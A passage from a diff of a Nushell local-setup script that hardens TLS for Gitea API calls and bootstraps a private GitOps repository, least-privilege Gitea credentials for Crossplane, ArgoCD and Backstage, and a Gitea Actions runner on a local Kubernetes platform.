+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -sS -o /dev/null -w "%{http_code}" https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members/digiorgdeveloper'
     } | complete)
 
     if ($dev_check.exit_code == 0) and (($dev_check.stdout | str trim) == "200") {
         print $"(ansi yellow)✓ 'digiorgdeveloper' already member of Owners team(ansi reset)"
     } else {
         let dev_add = (do {
-            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - -fsSk -X PUT https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members/digiorgdeveloper'
+            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS -X PUT https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members/digiorgdeveloper'
         } | complete)
         if $dev_add.exit_code == 0 {
             print $"(ansi green)✓ 'digiorgdeveloper' added to Owners team(ansi reset)"
@@ -2134,7 +2279,7 @@ def configure_gitea [] {
 
     # 4i: Verification — list Owners team members
     let verify = (do {
-        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - -fsSk https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members'
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members'
     } | complete)
     if $verify.exit_code == 0 {
         let members = ($verify.stdout | from json | get login)
@@ -2149,6 +2294,370 @@ def configure_gitea [] {
     }
 
     print $"(ansi green)✓ Gitea OIDC integration configured(ansi reset)"
+
+    # --- Step 5: Create the app-config GitOps sink repository (Issue #285) ---
+    print "5. Ensuring the app-config repository exists..."
+    configure_app_config_repo $gitea_pod $gitea_token
+
+    # --- Step 6: Least-privilege Crossplane Gitea credentials (Issue #285) ---
+    print "6. Ensuring least-privilege Crossplane Gitea credentials exist..."
+    configure_crossplane_gitea_credentials $gitea_pod $gitea_token
+
+    # --- Step 7: Least-privilege ArgoCD access to app-config (Issue #285) ---
+    print "7. Ensuring ArgoCD has least-privilege read-only access to app-config..."
+    configure_argocd_gitea_access $gitea_pod $gitea_token
+
+    # --- Step 8: Least-privilege Backstage publish credential (Issue #285) ---
+    print "8. Ensuring Backstage has a least-privilege GITEA_TOKEN for app-config publishing..."
+    configure_backstage_gitea_publisher $gitea_pod $gitea_token
+
+    # --- Step 9: Gitea Actions runner registration (Issue #285) ---
+    print "9. Ensuring the Gitea Actions runner is registered and online..."
+    configure_gitea_actions_runner $gitea_pod $gitea_token
+}
+
+# Create (idempotently) the private DigiOrg/app-config repository that is the
+# GitOps sink for generated AppClaim manifests (Issue #285 P0: "no declared
+# GitOps sink exists for generated manifests"), and seed the `claims/`
+# directory that the app-config ArgoCD Application (apps/platform/app-config.yaml)
+# watches -- this directory name MUST match core-portal's (already tested)
+# publishPhase.git.targetPath exactly, or every merged AppClaim PR silently
+# never reconciles. Uses the existing admin bootstrap token: this is one-time
+# platform bootstrap, not a per-AppClaim credential (see
+# configure_crossplane_gitea_credentials for that separate, narrower identity).
+def configure_app_config_repo [gitea_pod: string, gitea_token: string] {
+    let repo_check = (do {
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -sS -o /dev/null -w "%{http_code}" https://digiorg.local/gitea/api/v1/repos/DigiOrg/app-config'
+    } | complete)
+    if $repo_check.exit_code != 0 {
+        error make {msg: "Failed to query the DigiOrg/app-config repository in Gitea"}
+    }
+    let repo_status = ($repo_check.stdout | str trim)
+    if $repo_status == "200" {
+        print $"(ansi yellow)✓ Repository 'DigiOrg/app-config' already exists(ansi reset)"
+    } else if $repo_status == "404" {
+        let repo_create = (do {
+            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -sS -o /dev/null -w "%{http_code}" -X POST -H "Content-Type: application/json" --data "{\"name\":\"app-config\",\"description\":\"GitOps sink for generated AppClaim manifests (Issue #285). ArgoCD watches claims/ automatically.\",\"private\":true,\"auto_init\":true,\"default_branch\":\"main\"}" https://digiorg.local/gitea/api/v1/orgs/DigiOrg/repos'
+        } | complete)
+        if $repo_create.exit_code != 0 or (($repo_create.stdout | str trim) != "201") {
+            error make {msg: "Failed to create the DigiOrg/app-config repository in Gitea"}
+        }
+        print $"(ansi green)✓ Repository 'DigiOrg/app-config' created (private)(ansi reset)"
+    } else {
+        error make {msg: $"Unexpected HTTP status while querying DigiOrg/app-config: ($repo_status)"}
+    }
+
+    # Seed claims/.gitkeep so the directory the app-config Application
+    # watches exists from the first sync, even before any AppClaim PR merges.
+    let seed_check = (do {
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -sS -o /dev/null -w "%{http_code}" https://digiorg.local/gitea/api/v1/repos/DigiOrg/app-config/contents/claims/.gitkeep'
+    } | complete)
+    if $seed_check.exit_code != 0 {
+        error make {msg: "Failed to query the app-config claims/.gitkeep seed file"}
+    }
+    let seed_status = ($seed_check.stdout | str trim)
+    if $seed_status == "200" {
+        print $"(ansi yellow)✓ 'claims/' already seeded(ansi reset)"
+    } else if $seed_status == "404" {
+        let seed_content = ("" | encode base64)
+        let seed_create = (do {
+            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -sS -o /dev/null -w "%{http_code}" -X POST -H "Content-Type: application/json" --data "{\"content\":\"($seed_content)\",\"message\":\"chore: seed claims directory, issue 285\",\"branch\":\"main\"}" https://digiorg.local/gitea/api/v1/repos/DigiOrg/app-config/contents/claims/.gitkeep'
+        } | complete)
+        if $seed_create.exit_code != 0 or (($seed_create.stdout | str trim) != "201") {
+            error make {msg: "Failed to seed the app-config claims/ directory"}
+        }
+        print $"(ansi green)✓ 'claims/' seeded(ansi reset)"
+    } else {
+        error make {msg: $"Unexpected HTTP status while checking the claims/ seed file: ($seed_status)"}
+    }
+}
+
+# Create a dedicated, least-privilege Gitea identity for Crossplane's per-app
+# repository/CI provisioning (Issue #285 security constraint: "do not reuse a
+# broad platform administrator token"). Distinct from gitea_admin (one-time
+# platform bootstrap only) and from argocd-reader (read-only GitOps sink
+# access, below) -- this identity can only create repositories under DigiOrg
+# and push their contents, nothing else. Resume-safe: an existing Secret's
+# token is preserved; rotation is an explicit operator action.
+def configure_crossplane_gitea_credentials [gitea_pod: string, gitea_token: string] {
+    let secret_exists = ((do -i { kubectl --kubeconfig $KUBECONFIG_PATH get secret crossplane-gitea-credentials -n crossplane-system } | complete).exit_code == 0)
+
+    let users_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c 'gitea admin user list'
+    } | complete)
+    if $users_result.exit_code != 0 {
+        error make {msg: "Failed to list existing Gitea users"}
+    }
+    if not ($users_result.stdout | lines | any {|line| $line | str contains "crossplane-provisioner" }) {
+        gitea_create_user_random_password $gitea_pod "crossplane-provisioner" "crossplane-provisioner@digiorg.local" false
+    }
+
+    # Team scoped to repo creation + code push only -- no org administration,
+    # no member/webhook management (can_create_org_repo is the specific Gitea
+    # team permission that lets a non-Owner member create repos in the org).
+    let teams_result = (do {
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS https://digiorg.local/gitea/api/v1/orgs/DigiOrg/teams'
+    } | complete)
+    if $teams_result.exit_code != 0 {
+        error make {msg: "Failed to retrieve the DigiOrg teams from Gitea"}
+    }
+    let provisioners_team = ($teams_result.stdout | from json | where name == "platform-provisioners")
+    let provisioners_team_id = if ($provisioners_team | is-empty) {
+        let team_create = (do {
+            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS -X POST -H "Content-Type: application/json" --data "{\"name\":\"platform-provisioners\",\"description\":\"Least-privilege team: create+push app source repositories only (Issue #285)\",\"permission\":\"write\",\"can_create_org_repo\":true,\"units\":[\"repo.code\"]}" https://digiorg.local/gitea/api/v1/orgs/DigiOrg/teams'
+        } | complete)
+        if $team_create.exit_code != 0 {
+            error make {msg: "Failed to create the platform-provisioners Gitea team"}
+        }
+        (($team_create.stdout | from json).id)
+    } else {
+        ($provisioners_team | get id | first)
+    }
+    print $"(ansi green)✓ DigiOrg 'platform-provisioners' team ID: ($provisioners_team_id)(ansi reset)"
+
+    let member_check = (do {
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -sS -o /dev/null -w "%{http_code}" https://digiorg.local/gitea/api/v1/teams/($provisioners_team_id)/members/crossplane-provisioner'
+    } | complete)
+    if not (($member_check.exit_code == 0) and (($member_check.stdout | str trim) == "200")) {
+        let member_add = (do {
+            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS -X PUT https://digiorg.local/gitea/api/v1/teams/($provisioners_team_id)/members/crossplane-provisioner'
+        } | complete)
+        if $member_add.exit_code != 0 {
+            error make {msg: "Failed to add crossplane-provisioner to the platform-provisioners team"}
+        }
+    }
+
+    # Only the token itself is resume-preserved (rotation is an explicit
+    # operator action); user existence and team membership above are always
+    # re-verified/repaired first, even when the Secret already exists (Issue
+    # #285 blocker #9: authorization drift must not be silently trusted).
+    if $secret_exists {
+        print $"(ansi yellow)✓ 'crossplane-gitea-credentials' already present — preserved (membership re-verified)(ansi reset)"
+        return
+    }
+
+    # Scoped ONLY to write:repository -- not the broad admin scope list used
+    # for the one-time platform bootstrap token.
+    let token_name = $"crossplane-((date now | format date '%Y%m%d%H%M%S'))"
+    let token_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c $'gitea admin user generate-access-token --username crossplane-provisioner --token-name "($token_name)" --scopes write:repository --raw'
+    } | complete)
+    if $token_result.exit_code != 0 {
+        error make {msg: "Failed to generate the crossplane-provisioner access token"}
+    }
+    let provisioner_token = ($token_result.stdout | str trim)
+    if ($provisioner_token | is-empty) {
+        error make {msg: "Gitea returned an empty crossplane-provisioner access token"}
+    }
+    persist_opaque_secret "crossplane-system" "crossplane-gitea-credentials" "token" $provisioner_token
+    print $"(ansi green)✓ Least-privilege 'crossplane-gitea-credentials' created (write:repository only)(ansi reset)"
+}
+
+# Create a dedicated, read-only Gitea identity so ArgoCD's repo-server can
+# clone DigiOrg/app-config without any Gitea admin credential. The GitOps PR
+# destination and the credential that reads it back are a deliberately
+# separate concern from the per-app Gitea provisioning identity above (Issue
+# #285: "The GitOps pull-request repository and the per-application Gitea
+# source repository are separate concerns and must not be conflated").
+def configure_argocd_gitea_access [gitea_pod: string, gitea_token: string] {
+    let secret_exists = ((do -i { kubectl --kubeconfig $KUBECONFIG_PATH get secret app-config-repo-creds -n argocd } | complete).exit_code == 0)
+
+    let users_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c 'gitea admin user list'
+    } | complete)
+    if $users_result.exit_code != 0 {
+        error make {msg: "Failed to list existing Gitea users"}
+    }
+    if not ($users_result.stdout | lines | any {|line| $line | str contains "argocd-reader" }) {
+        gitea_create_user_random_password $gitea_pod "argocd-reader" "argocd-reader@digiorg.local" false
+    }
+
+    # Read-only collaborator on DigiOrg/app-config ONLY -- no org membership,
+    # no other repository. Re-applied every run (idempotent PUT) so a resumed
+    # run repairs drift even when the token Secret already exists (Issue #285
+    # blocker #9).
+    let collab_add = (do {
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS -X PUT -H "Content-Type: application/json" --data "{\"permission\":\"read\"}" https://digiorg.local/gitea/api/v1/repos/DigiOrg/app-config/collaborators/argocd-reader'
+    } | complete)
+    if $collab_add.exit_code != 0 {
+        error make {msg: "Failed to grant argocd-reader read-only access to DigiOrg/app-config"}
+    }
+    print $"(ansi green)✓ 'argocd-reader' has read-only access to DigiOrg/app-config(ansi reset)"
+
+    # Only the token itself is resume-preserved (rotation is an explicit
+    # operator action); user existence and collaborator access above are
+    # always re-verified/repaired first, even when the Secret already exists.
+    if $secret_exists {
+        print $"(ansi yellow)✓ ArgoCD app-config repository credential already present — preserved (membership re-verified)(ansi reset)"
+        return
+    }
+
+    # Scoped ONLY to read:repository.
+    let token_name = $"argocd-((date now | format date '%Y%m%d%H%M%S'))"
+    let token_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c $'gitea admin user generate-access-token --username argocd-reader --token-name "($token_name)" --scopes read:repository --raw'
+    } | complete)
+    if $token_result.exit_code != 0 {
+        error make {msg: "Failed to generate the argocd-reader access token"}
+    }
+    let reader_token = ($token_result.stdout | str trim)
+    if ($reader_token | is-empty) {
+        error make {msg: "Gitea returned an empty argocd-reader access token"}
+    }
+    # The trusted digiorg.local ingress over HTTPS (Issue #285 TLS
+    # hardening) -- must exact-match apps/platform/app-config.yaml's
+    # spec.source.repoURL (see the comment there for why).
+    persist_argocd_repo_secret "app-config-repo-creds" "https://digiorg.local/gitea/DigiOrg/app-config.git" "argocd-reader" $reader_token
+    print $"(ansi green)✓ ArgoCD app-config repository credential created (read:repository only)(ansi reset)"
+}
+
+# Create a dedicated, least-privilege Gitea identity for Backstage's own
+# create-pull-request publish action (Issue #285 blocker #2: Backstage's
+# core-portal app-config.yaml expects GITEA_TOKEN -- integrations.gitea[0].
+# password: ${GITEA_TOKEN} -- but no dedicated identity/env wiring existed,
+# so publishing an AppClaim manifest could never authenticate). Write access
+# ONLY to the private DigiOrg/app-config repository -- no org membership, no
+# other repository, and a separate identity from crossplane-provisioner
+# (creates per-app source repos) and argocd-reader (read-only GitOps sync):
+# each of the three credentials this issue introduces is scoped to exactly
+# one actor's actual need.
+def configure_backstage_gitea_publisher [gitea_pod: string, gitea_token: string] {
+    let secret_exists = ((do -i { kubectl --kubeconfig $KUBECONFIG_PATH get secret backstage-gitea-credentials -n backstage } | complete).exit_code == 0)
+
+    let users_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c 'gitea admin user list'
+    } | complete)
+    if $users_result.exit_code != 0 {
+        error make {msg: "Failed to list existing Gitea users"}
+    }
+    if not ($users_result.stdout | lines | any {|line| $line | str contains "backstage-appclaim-publisher" }) {
+        gitea_create_user_random_password $gitea_pod "backstage-appclaim-publisher" "backstage-appclaim-publisher@digiorg.local" false
+    }
+
+    # Write collaborator on DigiOrg/app-config ONLY -- no org membership, no
+    # other repository. Re-applied every run (idempotent PUT) so a resumed
+    # run repairs drift even when the token Secret already exists (Issue #285
+    # blocker #9).
+    let collab_add = (do {
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS -X PUT -H "Content-Type: application/json" --data "{\"permission\":\"write\"}" https://digiorg.local/gitea/api/v1/repos/DigiOrg/app-config/collaborators/backstage-appclaim-publisher'
+    } | complete)
+    if $collab_add.exit_code != 0 {
+        error make {msg: "Failed to grant backstage-appclaim-publisher write access to DigiOrg/app-config"}
+    }
+    print $"(ansi green)✓ 'backstage-appclaim-publisher' has write access to DigiOrg/app-config(ansi reset)"
+
+    # Only the token itself is resume-preserved (rotation is an explicit
+    # operator action); user existence and collaborator access above are
+    # always re-verified/repaired first, even when the Secret already exists.
+    if $secret_exists {
+        print $"(ansi yellow)✓ Backstage app-config publish credential already present — preserved (membership re-verified)(ansi reset)"
+        return
+    }
+
+    # Scoped ONLY to write:repository -- Backstage only needs to push a
+    # branch and open a pull request against DigiOrg/app-config.
+    let token_name = $"backstage-((date now | format date '%Y%m%d%H%M%S'))"
+    let token_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c $'gitea admin user generate-access-token --username backstage-appclaim-publisher --token-name "($token_name)" --scopes write:repository --raw'
+    } | complete)
+    if $token_result.exit_code != 0 {
+        error make {msg: "Failed to generate the backstage-appclaim-publisher access token"}
+    }
+    let publisher_token = ($token_result.stdout | str trim)
+    if ($publisher_token | is-empty) {
+        error make {msg: "Gitea returned an empty backstage-appclaim-publisher access token"}
+    }
+    # Dedicated single-purpose Secret, deliberately NOT a new key merged into
+    # the shared multi-key backstage-secrets object: persist_opaque_secret
+    # applies a Secret containing only this one key, and Kubernetes'
+    # three-way apply would otherwise prune backstage-secrets' other keys
+    # (POSTGRES_PASSWORD, AUTH_SESSION_SECRET, AUTH_OIDC_CLIENT_SECRET, ...).
+    persist_opaque_secret "backstage" "backstage-gitea-credentials" "GITEA_TOKEN" $publisher_token
+    print $"(ansi green)✓ Least-privilege 'backstage-gitea-credentials' created (write:repository only)(ansi reset)"
+}
+
+# Generate (once, resume-preserved) and persist the Gitea Actions runner
+# registration token, then unconditionally verify the runner is actually
+# online (Issue #285 blocker #4). Uses the exact Gitea Admin API this
+# platform's pinned chart actually runs (apps/platform/gitea.yaml: chart
+# 12.6.0, appVersion 1.26.1) -- confirmed against go-gitea/gitea's
+# templates/swagger/v1_json.tmpl at tag v1.26.1:
+# `POST /api/v1/admin/actions/runners/registration-token`. The older v1.23
+# `GET /api/v1/admin/runners/registration-token` no longer exists on this
+# chart's pinned appVersion. Registers at instance scope (the admin
+# endpoint), so the runner is available to every org/repo, including
+# DigiOrg/app-config and every per-app Gitea repository the pipeline
+# Composition creates. Uses the platform admin bootstrap token deliberately:
+# registering the one shared platform CI runner is one-time platform
+# bootstrap, not a per-app credential.
+def configure_gitea_actions_runner [gitea_pod: string, gitea_token: string] {
+    let secret_exists = ((do -i { kubectl --kubeconfig $KUBECONFIG_PATH get secret gitea-actions-runner-token -n gitea } | complete).exit_code == 0)
+
+    if not $secret_exists {
+        let token_result = (do {
+            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS -X POST https://digiorg.local/gitea/api/v1/admin/actions/runners/registration-token'
+        } | complete)
+        if $token_result.exit_code != 0 {
+            error make {msg: "Failed to generate the Gitea Actions runner registration token"}
+        }
+        let parsed = (try { $token_result.stdout | from json } catch { null })
+        let runner_token = if (($parsed | describe | str starts-with "record")) { ($parsed | get -o token | default "") } else { "" }
+        if ($runner_token | is-empty) {
+            error make {msg: "Gitea returned an empty Actions runner registration token"}
+        }
+        persist_opaque_secret "gitea" "gitea-actions-runner-token" "token" $runner_token
+        print $"(ansi green)✓ Gitea Actions runner registration token generated and persisted(ansi reset)"
+    } else {
+        print $"(ansi yellow)✓ 'gitea-actions-runner-token' already present — preserved(ansi reset)"
+    }
+
+    # Registration state (act_runner's own `.runner` file, on the runner's
+    # PersistentVolumeClaim) is what makes re-registration resume-stable, not
+    # this Secret alone -- so coming online is re-verified every run,
+    # regardless of whether the token above was just generated or preserved.
+    wait_for_gitea_actions_runner_online $gitea_pod $gitea_token
+}
+
+# Poll Gitea's Admin API until the runner named "digiorg-local-runner" is
+# listed and its status is explicitly "online". Gitea's Admin API only ever
+# emits "status": "online" or "offline" for a runner (services/convert/
+# convert.go's ToActionRunner @ go-gitea/gitea v1.26.1 hardcodes apiStatus to
+# "offline" and overwrites it to "online" only when runner.IsOnline() --
+# there is no third value). Accepting anything other than the literal
+# "online" -- including this function's own "unknown" fallback for a
+# missing/malformed `status` field -- fails closed instead of treating an
+# unverified/unrecognized status as ready. Bounded and fails closed: a
+# runner that never registers (bad token, image pull failure, rootless
+# dockerd startup failure, ...) surfaces as a real, actionable error here
+# rather than a silently-broken CI/CD capability discovered only later on
+# the first AppClaim's Gitea Actions run.
+def wait_for_gitea_actions_runner_online [gitea_pod: string, gitea_token: string] {
+    print "Waiting for the Gitea Actions runner to register and come online..."
+    mut last_diagnostic = "runner status was not observed"
+    for attempt in 1..60 {
+        let result = (do {
+            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS https://digiorg.local/gitea/api/v1/admin/actions/runners'
+        } | complete)
+        if $result.exit_code == 0 {
+            let parsed = (try { $result.stdout | from json } catch { null })
+            let runners = if (($parsed | describe | str starts-with "record")) { ($parsed | get -o runners | default []) } else { [] }
+            let matching = ($runners | where {|r| ($r | get -o name | default "") == "digiorg-local-runner" })
+            if (($matching | length) > 0) {
+                let status = ($matching | first | get -o status | default "unknown")
+                $last_diagnostic = $"status=($status)"
+                if $status == "online" {
+                    print $"(ansi green)✓ Gitea Actions runner 'digiorg-local-runner' is registered \(status: ($status)\)(ansi reset)"
+                    return
+                }
+            } else {
+                $last_diagnostic = "runner 'digiorg-local-runner' not yet listed"
+            }
+        } else {
+            $last_diagnostic = ($result.stderr | str trim)
+        }
+        sleep 5sec
+    }
+    error make {msg: $"Gitea Actions runner did not come online within the timeout \(last status: ($last_diagnostic)\)"}
 }
 
 # Compare SonarQube's /api/settings/values response with an expected JSON record.
@@ -2362,6 +2871,25 @@ def restart_oidc_deployment [namespace: string, deployment: string, timeout: str
     print $"(ansi green)✓ ($namespace)/($deployment) restarted(ansi reset)"
 }
 
+# A newly created CA Secret can precede Argo CD creating the Actions runner on
+# a clean cluster. Missing is therefore safe only for this early refresh path:
+# the runner will mount the current CA when it is first created. API, RBAC and
+# transport failures remain fatal, while an existing Deployment uses the same
+# strict restart/rollout gate as every other OIDC client.
+def restart_oidc_deployment_if_present [namespace: string, deployment: string, timeout: string] {
+    let lookup = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH get deployment $deployment -n $namespace --ignore-not-found -o name
+    } | complete)
+    if $lookup.exit_code != 0 {
+        error make {msg: $"Failed to determine whether deployment ($namespace)/($deployment) exists"}
+    }
+    if ($lookup.stdout | str trim | is-empty) {
+        print $"(ansi yellow)○ ($namespace)/($deployment) not created yet; it will mount the current CA on first start(ansi reset)"
+        return
+    }
+    restart_oidc_deployment $namespace $deployment $timeout
+}
+
 # Restart pods that depend on OIDC/Keycloak. This function is called only after
 # both Gitea and SonarQube configuration returned successfully.
 def restart_oidc_dependent_pods [] {
@@ -2381,6 +2909,54 @@ def restart_oidc_dependent_pods [] {
 # -----------------------------------------------------------------------------
 # Helper Functions
 # -----------------------------------------------------------------------------
+
+# Issue #285 (TLS hardening): copy only the public digiorg.local CA
+# certificate -- never cert-manager's private key -- from
+# cert-manager/digiorg-local-ca-secret into an Opaque Secret named
+# `digiorg-local-ca` in the given namespace, so credential-bearing clients
+# there (the crossplane provider-http ProviderConfig, Backstage, the Gitea
+# Actions runner) can verify the digiorg.local ingress's certificate without
+# insecureSkipVerify/NODE_TLS_REJECT_UNAUTHORIZED/-k. Idempotent (safe on
+# both a first bootstrap run and a resumed one): re-applies every run, and
+# returns whether the content actually changed so callers can decide whether
+# a dependent client needs restarting.
+def copy_digiorg_local_ca_to_namespace [target_namespace: string] {
+    $env.KUBECONFIG = $KUBECONFIG_PATH
+    let secret_name = "digiorg-local-ca"
+
+    let ca_cert_b64_result = (do {
+        kubectl get secret digiorg-local-ca-secret -n cert-manager -o jsonpath='{.data.ca\.crt}'
+    } | complete)
+    if $ca_cert_b64_result.exit_code != 0 or ($ca_cert_b64_result.stdout | str trim | is-empty) {
+        error make {msg: $"Could not extract the CA certificate to copy into ($target_namespace)"}
+    }
+    let ca_cert = ($ca_cert_b64_result.stdout | str trim)
+
+    let previous_b64_result = (do {
+        kubectl get secret $secret_name -n $target_namespace -o jsonpath='{.data.ca\.crt}'
+    } | complete)
+    let unchanged = ($previous_b64_result.exit_code == 0) and (($previous_b64_result.stdout | str trim) == $ca_cert)
+
+    # Windows/KinD-portable: a real temp file (not /dev/stdin) handed to
+    # `kubectl create secret --from-file`, matching the pattern
+    # patch_argocd_oidc_ca already uses for this same CA cert content.
+    let ca_tmp_file = $"digiorg-local-ca-($target_namespace).crt"
+    ($ca_cert | decode base64 | decode) | save -f $ca_tmp_file
+    let apply_result = (do {
+        (kubectl create secret generic $secret_name --namespace $target_namespace $"--from-file=ca.crt=($ca_tmp_file)" --dry-run=client -o yaml) | kubectl apply -f -
+    } | complete)
+    rm $ca_tmp_file
+    if $apply_result.exit_code != 0 {
+        error make {msg: $"Failed to copy the digiorg.local CA certificate into ($target_namespace)"}
+    }
+
+    if $unchanged {
+        print $"(ansi yellow)✓ CA cert already current in ($target_namespace)/($secret_name)(ansi reset)"
+    } else {
+        print $"(ansi green)✓ CA cert copied into ($target_namespace)/($secret_name)(ansi reset)"
+    }
+    not $unchanged
+}
 
 # Patch ArgoCD OIDC config with the self-signed CA cert via Helm upgrade.
 # Uses helm upgrade --reuse-values so ArgoCD self-sync does not overwrite it.
@@ -2437,8 +3013,19 @@ requestedScopes:
 rootCA: |\n($indented_cert)
 "
 
-    # Write Helm values override with oidc.config containing rootCA
-    let helm_override = {configs: {cm: {"oidc.config": $oidc_config}}}
+    # Write Helm values override with oidc.config containing rootCA, plus
+    # (Issue #285 TLS hardening) configs.tls.certificates -- the argo-cd
+    # chart's argocd-tls-certs-cm mechanism -- so ArgoCD's repo-server trusts
+    # this same CA for the app-config GitOps sink repo
+    # (apps/platform/app-config.yaml), now cloned via the trusted
+    # digiorg.local ingress over HTTPS rather than the raw in-cluster
+    # gitea-http Service address.
+    let helm_override = {
+        configs: {
+            cm: {"oidc.config": $oidc_config}
+            tls: {certificates: {"digiorg.local": $ca_cert}}
+        }
+    }
     $helm_override | to yaml | save -f ./argocd-oidc-override.yaml
 
     # Re-run helm upgrade with the override — embeds CA cert in the Helm release

--- a/scripts/local-setup.nu
+++ b/scripts/local-setup.nu
@@ -2342,7 +2342,7 @@ def configure_app_config_repo [gitea_pod: string, gitea_token: string] {
         if $repo_create.exit_code != 0 or (($repo_create.stdout | str trim) != "201") {
             error make {msg: "Failed to create the DigiOrg/app-config repository in Gitea"}
         }
-        print $"(ansi green)✓ Repository 'DigiOrg/app-config' created (private)(ansi reset)"
+        print $"(ansi green)✓ Repository 'DigiOrg/app-config' created \(private\)(ansi reset)"
     } else {
         error make {msg: $"Unexpected HTTP status while querying DigiOrg/app-config: ($repo_status)"}
     }
@@ -2432,7 +2432,7 @@ def configure_crossplane_gitea_credentials [gitea_pod: string, gitea_token: stri
     # re-verified/repaired first, even when the Secret already exists (Issue
     # #285 blocker #9: authorization drift must not be silently trusted).
     if $secret_exists {
-        print $"(ansi yellow)✓ 'crossplane-gitea-credentials' already present — preserved (membership re-verified)(ansi reset)"
+        print $"(ansi yellow)✓ 'crossplane-gitea-credentials' already present — preserved \(membership re-verified\)(ansi reset)"
         return
     }
 
@@ -2450,7 +2450,7 @@ def configure_crossplane_gitea_credentials [gitea_pod: string, gitea_token: stri
         error make {msg: "Gitea returned an empty crossplane-provisioner access token"}
     }
     persist_opaque_secret "crossplane-system" "crossplane-gitea-credentials" "token" $provisioner_token
-    print $"(ansi green)✓ Least-privilege 'crossplane-gitea-credentials' created (write:repository only)(ansi reset)"
+    print $"(ansi green)✓ Least-privilege 'crossplane-gitea-credentials' created \(write:repository only\)(ansi reset)"
 }
 
 # Create a dedicated, read-only Gitea identity so ArgoCD's repo-server can
